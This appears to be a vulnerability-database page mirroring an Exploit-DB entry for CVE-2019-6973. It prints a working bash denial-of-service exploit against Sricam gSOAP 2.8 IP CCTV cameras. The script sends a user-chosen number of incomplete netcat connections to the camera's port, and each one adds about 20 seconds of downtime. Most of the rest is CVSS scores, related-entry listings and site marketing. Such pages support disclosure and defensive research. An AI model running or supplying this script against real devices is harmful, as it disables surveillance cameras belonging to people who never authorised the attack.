Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sricam gSOAP 2.8 - Denial of Service

🗓️ 28 Jan 2019 00:00:00Reported by Andrew WatsonType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 450 Views

Sricam gSOAP 2.8 - Denial of Service on IP CCTV Camer

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sricam gSOAP 2.8 - Denial of Service Exploit
28 Jan 201900:00
zdt
CVE		CVE-2019-6973
17 Mar 201918:12
cve
Cvelist		CVE-2019-6973
17 Mar 201918:12
cvelist
exploitpack		Sricam gSOAP 2.8 - Denial of Service
28 Jan 201900:00
exploitpack
NVD		CVE-2019-6973
21 Mar 201916:01
nvd
Packet Storm		Sricam gSOAP 2.8 Denial Of Service
29 Jan 201900:00
packetstorm
Prion		Denial of service
21 Mar 201916:01
prion
#!/bin/bash

#######################################################################################
#
#     Exploit Title: Sricam gSOAP 2.8 - Denial of Service
#              Date: 25/01/2019           
#     Vendor Status: Informed (24/10/2018)
#            CVE ID: CVE-2019-6973
#    Exploit Author: Andrew Watson
#           Contact: https://keybase.io/bitfu
#  Software Version: Sricam gSOAP 2.8
#   Vendor Homepage: http://www.sricam.com/
#         Tested on: Sricam IP CCTV Camera running gSOAP 2.8 on TCP/5000
#       PoC Details: Sricam IP CCTV Camera's are vulnerable to denial of service,
#                    exploitable by sending multiple incomplete requests.
#        References: https://github.com/bitfu/sricam-gsoap2.8-dos-exploit
#
#        DISCLAIMER: This proof of concept is provided for educational purposes only!
#
#######################################################################################


if [ -z "$3" ]; then
	echo "#############################################################################"
	echo -e "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
	echo -e "\n[*] Usage: $0 <IP_Address> <Port> <#_DoS_Payloads>"
	echo "[*] Example: $0 127.0.0.1 5000 10"
	echo -e "\n[!] Each DoS payload sent adds another 20 seconds downtime.\n"
	exit 0
fi

time=$(expr $3 \* 20)
echo "[*] Sricam gSOAP 2.8 Denial of Service exploit by bitfu"
echo -e "\n[+] Sending $3 DoS payloads..."
echo "[+] Expected downtime: $time seconds"
for dos in $(seq 1 $3); do
netcat $1 $2 &
done
echo -e "\n[!] $dos DoS payloads sent to: $1:$2"
echo

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jan 2019 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.12542
exploitvendorcve-2019-6973dosgsoap 2.8sricamip addressportpayloadsnetcat
450